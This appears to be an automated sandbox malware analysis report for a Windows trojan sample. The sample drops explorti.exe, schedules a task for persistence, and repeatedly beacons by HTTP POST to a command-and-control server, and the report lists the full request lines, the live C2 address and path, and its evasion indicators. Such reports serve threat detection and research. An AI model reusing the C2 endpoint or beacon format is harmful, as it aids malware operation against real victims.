Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 6_2_0061BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

6_2_0061BD60

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000006.00000002.3254546503.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php#
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php%
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php/
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php5eb8a7
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php9
Source: explorti.exe, 00000006.00000002.3254546503.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php=
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpA
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC:
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpheCounterMutexw
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpi
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpj
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpon
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpsoft
Source: explorti.exe, 00000006.00000002.3254546503.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpz

System Summary

PE file contains section with special chars

Source: LbMTyCFRzs.exe	Static PE information: section name:
Source: LbMTyCFRzs.exe	Static PE information: section name: .idata
Source: LbMTyCFRzs.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00653068	6_2_00653068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_0061E440	6_2_0061E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00614CF0	6_2_00614CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00647D83	6_2_00647D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_0065765B	6_2_0065765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00614AF0	6_2_00614AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_0065777B	6_2_0065777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00658720	6_2_00658720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00656F09	6_2_00656F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_00652BD0	6_2_00652BD0

Source: LbMTyCFRzs.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: LbMTyCFRzs.exe	Static PE information: Section: ZLIB complexity 0.9999092810792349
Source: LbMTyCFRzs.exe	Static PE information: Section: asfmuayv ZLIB complexity 0.9944697900907715
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9999092810792349
Source: explorti.exe.0.dr	Static PE information: Section: asfmuayv ZLIB complexity 0.9944697900907715

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Jump to behavior

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LbMTyCFRzs.exe

Virustotal: Detection: 52%

Source: LbMTyCFRzs.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

File read: C:\Users\user\Desktop\LbMTyCFRzs.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LbMTyCFRzs.exe "C:\Users\user\Desktop\LbMTyCFRzs.exe"
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
